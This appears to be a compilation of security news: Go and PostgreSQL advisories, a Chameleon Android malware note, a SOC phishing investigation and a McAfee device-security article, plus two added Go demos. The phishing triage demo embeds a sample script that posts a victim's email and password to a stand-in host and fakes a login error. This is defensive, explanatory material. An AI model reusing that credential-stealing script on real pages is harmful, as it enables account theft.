Critical Patches Issued for Microsoft Products, January 09, 2024

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

USN-6038-2: Go vulnerabilities

USN-6038-1 fixed several vulnerabilities in Go 1.18. This update provides
the corresponding updates for Go 1.13 and Go 1.16.

CVE-2022-29526 and CVE-2022-30630 only affected Go 1.16.

Original advisory details:

It was discovered that the Go net/http module incorrectly handled
Transfer-Encoding headers in the HTTP/1 client. A remote attacker could
possibly use this issue to perform an HTTP Request Smuggling attack.
(CVE-2022-1705)

It was discovered that Go did not properly manage memory under certain
circumstances. An attacker could possibly use this issue to cause a panic
resulting in a denial of service. (CVE-2022-1962, CVE-2022-27664,
CVE-2022-28131, CVE-2022-30630, CVE-2022-30631, CVE-2022-30632,
CVE-2022-30633, CVE-2022-30635, CVE-2022-32189, CVE-2022-41715,
CVE-2022-41717, CVE-2023-24534, CVE-2023-24537)

It was discovered that Go did not properly implement the maximum size of
file headers in Reader.Read. An attacker could possibly use this issue to
cause a panic resulting in a denial of service. (CVE-2022-2879)

It was discovered that the Go net/http module incorrectly handled query
parameters in requests forwarded by ReverseProxy. A remote attacker could
possibly use this issue to perform an HTTP Query Parameter Smuggling attack.
(CVE-2022-2880)
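As an added illustration (not part of the advisory), this Go program shows the behaviour of a patched net/http/httputil.ReverseProxy with respect to CVE-2022-2880 (fixed in Go 1.19.2 and 1.18.7): when the proxy's Director has parsed the request parameters, net/http re-encodes the forwarded query and drops parameters url.ParseQuery rejects, while a proxy that never inspects the parameters forwards the raw query unchanged. The backend, query strings and parameter names are constructed for the demo.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
)

// ForwardedQuery stands up a backend that echoes the raw query string it
// receives, places an httputil.ReverseProxy in front of it, and returns what the
// backend saw for the given client-side query string. With inspectQuery set, the
// proxy's Director calls ParseForm, i.e. the proxy itself reads the parameters,
// which is the situation CVE-2022-2880 is about: a parameter net/http cannot
// parse must not silently reach a backend that may parse it differently.
func ForwardedQuery(rawQuery string, inspectQuery bool) (string, error) {
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, r.URL.RawQuery)
	}))
	defer backend.Close()

	target, err := url.Parse(backend.URL)
	if err != nil {
		return "", err
	}
	proxy := httputil.NewSingleHostReverseProxy(target)
	if inspectQuery {
		rewrite := proxy.Director
		proxy.Director = func(r *http.Request) {
			rewrite(r)
			_ = r.ParseForm() // the proxy reads the parameters (routing, allow-listing, ...)
		}
	}
	front := httptest.NewServer(proxy)
	defer front.Close()

	resp, err := http.Get(front.URL + "/?" + rawQuery)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	return string(body), nil
}

func main() {
	// Constructed inputs: an invalid percent-escape and a semicolon separator,
	// both of which url.ParseQuery rejects in current Go.
	for _, q := range []string{"user=alice&role=%zz", "user=alice;role=admin"} {
		raw, _ := ForwardedQuery(q, false)
		clean, _ := ForwardedQuery(q, true)
		fmt.Printf("client sent %q\n  proxy ignoring params forwards %q\n  proxy parsing params forwards %q\n", q, raw, clean)
	}
}
```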

It was discovered that Go did not properly manage the permissions for the
Faccessat function. An attacker could possibly use this issue to expose
sensitive information. (CVE-2022-29526)

It was discovered that Go did not properly generate the values for
ticket_age_add in session tickets. An attacker could possibly use this
issue to observe TLS handshakes to correlate successive connections by
comparing ticket ages during session resumption. (CVE-2022-30629)

It was discovered that Go did not properly manage client IP addresses in
net/http. An attacker could possibly use this issue to cause ReverseProxy
to set the client IP as the value of the X-Forwarded-For header.
(CVE-2022-32148)

It was discovered that Go did not properly validate backticks (`) as
JavaScript string delimiters, and did not escape them as expected. An
attacker could possibly use this issue to inject arbitrary JavaScript code
into the Go template. (CVE-2023-24538)

PIN-Stealing Android Malware

This is an old piece of malware—the Chameleon Android banking Trojan—that now disables biometric authentication in order to steal the PIN:

The second notable new feature is the ability to interrupt biometric operations on the device, like fingerprint and face unlock, by using the Accessibility service to force a fallback to PIN or password authentication.

The malware captures any PINs and passwords the victim enters to unlock their device and can later use them to unlock the device at will to perform malicious activities hidden from view.

Stories from the SOC: Something smells phishy

Executive summary

In the current cyber landscape, adversaries commonly employ phishing as the leading technique to compromise enterprise security. The susceptibility of human behavior makes individuals the weakest link in the security chain. Consequently, there is an urgent need for robust cybersecurity measures. Phishing, which capitalizes on exploiting human behavior and vulnerabilities, remains the adversary’s top choice. To counter this threat effectively, ongoing education and awareness initiatives are essential. Organizations must recognize and address the pivotal role of human vulnerability in cybersecurity.

During regular business hours, an alarm was generated because one of a customer’s users had interacted with a potentially malicious phishing link. This prompted a thorough investigation by analysts that involved leveraging multiple Open-Source Intelligence (OSINT) tools such as VirusTotal and URLscan.io. Through a meticulous examination, analysts were able to unveil suspicious scripts within the phishing webpage’s Document Object Model (DOM) that pinpointed an attempt to exfiltrate user credentials. This detailed analysis emphasizes the importance of proactive cybersecurity measures and showcases the effectiveness of analysts leveraging OSINT tools along with their expertise to accurately assess threats within customers’ environments.

Investigation

The alarm

The Managed Detection and Response (MDR) Security Operations Center (SOC) initially received an alarm triggered by a potentially malicious URL that a user received in their inbox. Office 365’s threat intelligence feed flagged this URL as potentially malicious. The initial steps in addressing this alarm involve two key actions.

First, it is crucial to determine the scope of impact on the customer’s environment by assessing how many other users received the same URL. Second, a thorough validation process is essential to confirm whether the URL is indeed malicious. These initial steps lay the foundation for a comprehensive response to safeguard the security of the environment.

A comprehensive search within the customer’s environment revealed that no other users had received the same URL. As a result, only one user is affected, suggesting that this is an isolated incident and does not appear to be part of a targeted attack on the customer’s environment. With this understanding, the focus can now shift to the second step: validating the reputation of the URL.

By employing the OSINT tool VirusTotal and inputting the URL received by the user, we aim to assess its potential threat level. VirusTotal aggregates results from various security vendors to provide a comprehensive analysis. In the current evaluation, 13 out of 90 security vendors classify this URL as malicious. It’s important to note that while the number of vendors flagging the URL is a key factor, a conclusive determination of malicious intent typically considers a consensus among a significant portion of these vendors. A higher number of detections by diverse security platforms strengthens the confidence in labeling the URL as malicious.

With a potentially malicious URL identified, it is imperative to delve deeper to ascertain the underlying reasons for its malicious reputation. Analysts will utilize a tool such as URLscan.io for this purpose. URLscan.io serves as a sandbox, providing a risk-free environment for visiting websites. This tool is instrumental in conducting a thorough examination to uncover the nuances contributing to the URL’s malicious classification.

After entering our identified malicious URL into URLscan.io, we can examine the webpage intended for our customer’s user. Upon visiting this URL, a PDF file is prepared for user download. However, a mere screenshot of the webpage is insufficient to provide a definitive reputation. To obtain more insight, we must delve deeper into the webpage by examining its DOM.

The DOM comprises the essential components of a webpage, encompassing HTML, CSS, and JavaScript that define the structure, presentation, and behavior of the page. URLscan.io facilitates a convenient examination of the DOM. In reviewing the DOM, particular attention is given to identifying any malicious scripts that may be present. The focus is often on searching for the <script> HTML tags, which denote script elements within a webpage.

In the evaluation of the DOM associated with the potentially malicious URL, multiple <script> tags are observed. Within these tags, it becomes apparent that upon the user’s interaction with the “download all” button, a prompt will request them to input their email and password.

This is the start of the script that defines the email and password variables.

Continuing through the script, more concerning code emerges. While the user is prompted to enter email and password information, it becomes apparent that the adversary has crafted code designed to falsely claim that the entered email and/or password is incorrect, even if it is not. This behavior aligns with typical phishing activities, where malicious actors attempt to induce users to enter their credentials multiple times. This tactic aims to exploit potential typos or errors in the entered information, ensuring that the adversary ultimately obtains the correct credentials from the victim.

After the user submits their credentials, the user’s email and password are transmitted to the website “hxxps://btmalta.cam/wefmail/email (1).php” via an AJAX POST request. In the context of web development, an AJAX (Asynchronous JavaScript and XML) POST is a technique that allows data to be sent to a server asynchronously without requiring a page refresh. Unfortunately, malicious actors exploit this functionality to surreptitiously transmit sensitive user information, as observed in this instance.

Conducting OSINT on the aforementioned site (“hxxps://btmalta.cam/wefmail/email (1).php”) reveals a malicious reputation, notably marked by its relatively recent creation: the domain was only 80 days old from its registration date. The registration age of a domain is a useful factor in assessing its credibility. In this case, the combination of a newly registered domain and indications of malicious activity raises significant concerns. It strongly suggests that the adversary is deliberately using this domain to collect the user-entered email and password.

Considering the aforementioned details, it becomes more evident that this is a credible phishing attempt targeting one of our customers’ users. The method of data transmission, the malicious reputation of the domain, and its recent registration collectively underscore the severity of the situation.
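As an added example (not part of the SOC write-up and not an analyst tool from the original), this Go program applies the same checks the analysts performed by hand to a DOM capture: inline scripts that reference credential variables, send them with an AJAX/XHR/fetch call, reach a host other than the page’s own, and show the fake “incorrect email or password” message. The sample DOM, hostnames and URLs are constructed placeholders, not the real phishing site.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Constructed sample DOM shaped like the write-up: a "download all" page whose inline
// script collects email and password, posts them to another host, then claims they were wrong.
const sampleDOM = `<html><body><button onclick="verify()">Download all</button>
<script>
  var email = "", password = "";
  function verify() {
    email = document.getElementById("e").value;
    password = document.getElementById("p").value;
    $.ajax({ type: "POST", url: "https://collector.example.invalid/mail/email.php",
             data: { email: email, password: password } });
    alert("Incorrect email or password. Please try again.");
  }
</script>
<script src="https://cdn.example.org/jquery.min.js"></script></body></html>`

var (
	scriptRe = regexp.MustCompile(`(?is)<script[^>]*>(.*?)</script>`)
	credRe   = regexp.MustCompile(`(?i)\b(password|passwd|pwd|email|username)\b`)
	sendRe   = regexp.MustCompile(`(?i)(\$\.ajax|\$\.post|XMLHttpRequest|fetch\s*\()`)
	urlRe    = regexp.MustCompile(`https?://[^\s"'<>)]+`)
	retryRe  = regexp.MustCompile(`(?i)(incorrect|invalid|wrong)\s+(email|password)`)
)

// Finding records, for one inline script, the indicators the analysts used.
type Finding struct {
	CredentialVars bool     // references email/password-style identifiers
	SendsData      bool     // uses an AJAX/XHR/fetch call
	FakesRejection bool     // shows an "incorrect email/password" message
	OffOriginHosts []string // hosts reachable from the script other than the page's own
}

// Indicators counts how many of the four indicators are present (0..4).
func (f Finding) Indicators() int {
	score := map[bool]int{true: 1}
	return score[f.CredentialVars] + score[f.SendsData] + score[f.FakesRejection] + score[len(f.OffOriginHosts) > 0]
}

// TriageDOM scans the inline <script> bodies of a captured DOM; external
// scripts (<script src=...> with an empty body) are skipped here.
func TriageDOM(dom, pageURL string) ([]Finding, error) {
	page, err := url.Parse(pageURL)
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, m := range scriptRe.FindAllStringSubmatch(dom, -1) {
		body := m[1]
		if strings.TrimSpace(body) == "" {
			continue
		}
		f := Finding{
			CredentialVars: credRe.MatchString(body),
			SendsData:      sendRe.MatchString(body),
			FakesRejection: retryRe.MatchString(body),
		}
		for _, raw := range urlRe.FindAllString(body, -1) {
			if u, err := url.Parse(raw); err == nil && !strings.EqualFold(u.Hostname(), page.Hostname()) {
				f.OffOriginHosts = append(f.OffOriginHosts, u.Hostname())
			}
		}
		out = append(out, f)
	}
	return out, nil
}

func main() {
	findings, _ := TriageDOM(sampleDOM, "https://mail.example.invalid/wefmail/")
	fmt.Printf("%d inline script(s); first shows %d/4 indicators, posting to %v\n",
		len(findings), findings[0].Indicators(), findings[0].OffOriginHosts)
}
```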

Customer interaction

After the findings were observed, an investigation was created for the customer to review. If the customer’s affected user entered any credential information, the user account should be considered compromised. Since this affected a user within the customer’s Office 365 environment, it was recommended that the customer follow the guidelines set by Microsoft in the event of an email account compromise: Responding to a compromised email account

How to combat against phishing attempts

In the ongoing battle against phishing attempts, implementing effective strategies is paramount to fortifying cybersecurity defenses. Listed below are some of the many key practices and countermeasures to safeguard your organization from falling victim to malicious phishing activities.

Ensure that users go through regular security training to learn about the dangers of potential phishing attempts.
Employ processes that allow users to report potential phishing emails that they receive.
Ensure users are properly utilizing Multi-Factor Authentication (MFA).
Ensure strong password policies are in place to prevent any weak or insecure passwords from being used.
To check whether your password or email has ever been involved in a data breach, you can use the free tool at https://haveibeenpwned.com/.

USN-6570-1: PostgreSQL vulnerabilities

Pedro Gallegos discovered that PostgreSQL incorrectly handled modifying
certain SQL array values. A remote attacker could use this issue to obtain
sensitive information, or possibly execute arbitrary code. (CVE-2023-5869)

Hemanth Sandrana and Mahendrakar Srinivasarao discovered that PostgreSQL
allowed the pg_signal_backend role to signal certain superuser processes,
contrary to expectations. (CVE-2023-5870)

New Year, New Tech at CES — The Latest Protection for the Latest Tech

New year, new tech. That’s what hits the floor at the CES show each January in Las Vegas. Whether it’s striking, strange, or just pretty cool, plenty of this year’s tech is connected — and that means it needs to get protected.  

Already we’ve seen a personal health scanner that works like a tricorder from Star Trek, smart belts that help people with limited vision get around safely, and smart locks that open your door with the palm of your hand. 

Coursing through all these connected devices are data and info — data and info about you. Your family. Your home. Your comings and goings. The kind of data and info that all kinds of people want to get their hands on. 

That’s where protection comes in. 

Any device connected to the internet must be protected. Even if it’s something as innocuous as a smart wall outlet. The reason is that your home network is only as strong as its weakest security link. And many smart devices don’t come with the best security out of the box. Hackers know this. By compromising a device like a smart wall outlet, a hacker can gain access to the rest of the network and the devices and data on it.

But how do you protect a smart wall outlet, along with that smart coffeemaker, door lock, and refrigerator? We’ll run it down for you, plus advice for keeping the latest in medical, fitness, and mobile devices safe as well. 

How to protect your new tech

Broadly speaking, you can protect most of your tech with a handful of steps. Whether it’s a new Wi-Fi router, smartwatch, or even a connected fridge, they can all benefit from the following basics.  

Use strong, unique passwords. 

When it’s time to set up a new account or device, go with a strong, unique password. Strong means a mix of at least 12 characters, if not more. That includes a mix of numbers, symbols, and both letter cases, upper and lower. Unique means you don’t repeat it across accounts. That way, if one password gets compromised, the rest will remain secure.  

Why strong and unique? Given today’s computing power, a hacker’s password generator can create millions of passwords in seconds. Weak passwords have no chance against them. It’s a simple matter of statistics. 

Consider a password that uses eight numbers, uppercase and lowercase letters, and symbols. Sounds pretty strong, right? Unfortunately, a brute-force attack might crack that password in as fast as one second. One second …  

Password length                                              Time to crack
(using numbers, uppercase and lowercase letters, and symbols)

 8 characters                                                One second
12 characters                                                Eight months
16 characters                                                16 million years

However, increase that password length to twelve numbers, uppercase and lowercase letters, and symbols — it’d take eight months to crack that password. Bump it up to 16, and it would take 16 million years. The longer it is, the more complex it is. And thus tougher to crack. It’s the difference between one second and 16 million years. And if a hacker’s brute-force attack on one password takes too long, it’ll simply move on to the next one.

A password manager can help create strong, unique passwords for you. Also found in comprehensive online protection software, a password manager can create and securely store strong and unique passwords for your mom and dad, giving them one less thing they need to remember and worry about. 

Use multi-factor authentication

Online banks, shops, and other services commonly offer multi-factor authentication to help protect your accounts — with the typical combination of your username, password, and a security code sent to another device you own (often a mobile phone).  

If your device or account supports multi-factor authentication, consider using it there too. It throws a big barrier in the way of hackers who try and force their way into your device with a password/username combination.  

Keep everything updated

Update your apps and devices regularly. In addition to fixing the odd bug or adding the occasional new feature, app and device updates often address security gaps. Out-of-date apps and devices might have flaws that hackers can exploit, so regular updating is a must from a security standpoint. If you can set your apps and devices to receive automatic updates, even better. 

Keep in mind that this very much applies to smart home devices as well. 

Secure your internet router

Another device that needs good password protection is your internet router. Make sure you use a strong and unique password there as well to help prevent hackers from breaking into your home network.  

Also consider changing the name of your home network so that it doesn’t personally identify you. Fun alternatives to using your name or address include everything from movie lines like “May the Wi-Fi be with you” to old sitcom references like “Central Perk.” Also check that your router is using an encryption method, like WPA2 or the newer WPA3, which will keep your signal secure.  

Protect (your) everything 

Comprehensive online protection software can secure your phones, tablets, and computers. Moreover, it can protect your privacy, identity, and spot scam texts, messages, and links — just to name a few of the many things it can do.  

Moreover, these devices often connect to other devices on your home network. In a way, they act as a remote control for smart home devices like thermostats, alarms, and door locks. Protecting phones, tablets, and computers thus protects those other devices by extension.

How to protect your smart home devices 

The smarts behind a smart home come from you. At least when it comes to keeping it more private and secure. The thing with smart home devices is this, they’re connected. And anything that gets connected gets protected. That can look a little different for these devices than it does for your computers and phones, yet there are steps you can take. 

Reset the factory password

Many smart home and internet of things (IoT) devices come with preset usernames and passwords from the factory. So much so, that you can easily find lists of stock usernames and passwords for these devices posted online where hackers can get a hold of them.

In the past, we’ve seen all kinds of attacks occur when these credentials don’t get changed. Among them are stories of hacked baby monitors where attackers take control of the camera and speakers. So just as you do for your other devices and accounts, create a fresh username and pair it with a strong, unique password as outlined above. 

Upgrade to a newer internet router 

Likewise, older routers might have outdated security measures, which might make them more prone to attacks. If you’re renting yours from your internet provider, contact them for an upgrade. If you’re using your own, visit a reputable news or review site such as Consumer Reports for a list of the best routers that combine speed, capacity, and security. 

Set up a guest network specifically for your IoT devices 

Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices on your primary network, the one where you connect your computers and smartphones.  

One more note — research the manufacturer 

One of the strongest security measures you can take is research. Before purchasing, look up the manufacturer. Have they had security issues with their devices in the past? Are their devices well-reviewed? How about their privacy policy? What are they doing with your data?  

It can get a little tricky tracking down that kind of info, yet you have a couple of great places to start. One is Consumer Reports and their thorough reviews of devices and tech. Another resource is Mozilla Foundation’s “Privacy Not Included” site, which reviews connected products like smart home and IoT devices for safety and security. 

How to protect your telemedicine visits 

For a quick check-in, a prescription consultation, or just a conversation with a healthcare pro, telemedicine has firmly established itself as a viable option for many types of care. Of course, the info discussed and shared in such a visit can be sensitive.   

Use a VPN 

A VPN, or virtual private network, offers a strong layer of additional protection when you’re transmitting health data or having a private conversation about your health with a professional. A VPN creates an encrypted tunnel to keep you and your activity anonymous. In effect, your data is scrambled and hidden to anyone outside your VPN tunnel, thus making your private info difficult to collect. Check with the care provider to see if their telemedicine solution uses a VPN. If not, you can always get a VPN as part of your online protection software. 

Check in with your provider 

If you’re considering a virtual doctor visit, now’s a great chance to check in with your care provider before your appointment. This way, you can get comfortable with what your visit will look like, find out what special apps (if any) are used, and how your care provider will protect your privacy. Also, you can decide which device you’ll use and where you’ll use it so that you feel at ease during your virtual visit. 

A reputable care provider will likely put all this pre-appointment info together for you on their website or “frequently asked questions” (FAQ) page, which will include helpful links and numbers to call if you need help or have questions. For an example of what that might look like, check out the telemedicine page that Virginia Mason/Franciscan Health designed for its patients. 

Pick a private place 

We’ve talked plenty about digital security, yet there’s the old-fashioned issue of physical eavesdropping to think about too. When it’s time for your actual appointment, pick a place in your home where you can ensure yourself some privacy. (Of course, don’t go online for your virtual appointment in a public place.) Look for a space where you can’t be overheard by neighbors and passers-by — preferably someplace like your bedroom where you can be comfortable as well.  

How to protect your fitness and wearable devices

By design, many wearables are big on data collection. Coursing through them are all kinds of data, about your vital signs, sleep patterns, not to mention your whereabouts — like when and where you like to run on your hill training days. Keeping these devices secure means keeping some of your most personal info secure as well. 

As always, research the manufacturer 

Very similar to what we mentioned about smart home and IoT devices, check the manufacturer’s track record. Read reviews. Hit up trusted sources. In all, find out how private and secure your device is. The same resources listed above can help you make an informed purchase. 

When it comes to privacy, not all manufacturers’ privacy policies are equal. Reading the privacy policy will tell you what kind of data the device collects. Further, it will show if and how it’s shared with the manufacturer and if they sell or share it with others. Likewise, you can factor what you find into your purchasing decision.

Adjust the privacy settings 

This will vary from device to device as well, yet one more way you can lock down your privacy is in the device settings. Look for options around location tracking, social media sharing, and what types of data are shared online in addition to the device. Overall, consider what kind of fitness data it gathers and where it goes. If you’re not comfortable with that data ending up in the hands of a stranger, make it private. 

When upgrading to a new device, wipe your old one. 

Along the same lines, that old wearable of yours might be chock full of data. Before passing it along, selling it, or recycling it, wipe it. Remove all the old data by restoring it to factory settings (your manufacturer can show you how).  

Also, delete any old online account associated with it if you have no more use for it. See to it that any data with that account gets deleted as well, which leaves you with one less account that could wind up the target of a data breach. A service like our own McAfee Online Account Cleanup can help, which you can find in our McAfee+ plans. 

How to protect your mobile devices 

Certainly, if there’s one device that works like the remote control for our lives, it’s our smartphone. Smartphones and mobile devices like them need protection too — in their own right, and because they connect to so much more. 

Avoid third-party app stores 

Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, Google and Apple are quick to remove malicious apps from their stores when discovered, making shopping there safer still.  

Review apps carefully

Check out the developer — have they published several other apps with many downloads and good reviews? A legit app typically has quite a few reviews, whereas malicious apps might have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it.  

Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or from app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download.  

Keep an eye on app permissions

Another way hackers weasel their way into your device is by getting permissions to access things like your location, contacts, and photos — and they’ll use malicious apps to do it. If an app asks for way more than you bargained for, like a simple puzzle game that asks for access to your camera or microphone, it might be a scam. Delete the app.  

Lock your phone — and keep an eye on it too

Some bad actors will try to install spyware on phones themselves. However, this requires access, time, and effort to pull off. Locking your phone and always keeping it close can help prevent bad actors from infecting your phone this way. 

Another step you can take is to familiarize yourself with the remote locking and wiping features of your mobile device. Many manufacturers offer this feature on mobile devices. Strongly consider using it in the event of loss or theft. 


The post New Year, New Tech at CES — The Latest Protection for the Latest Tech appeared first on McAfee Blog.
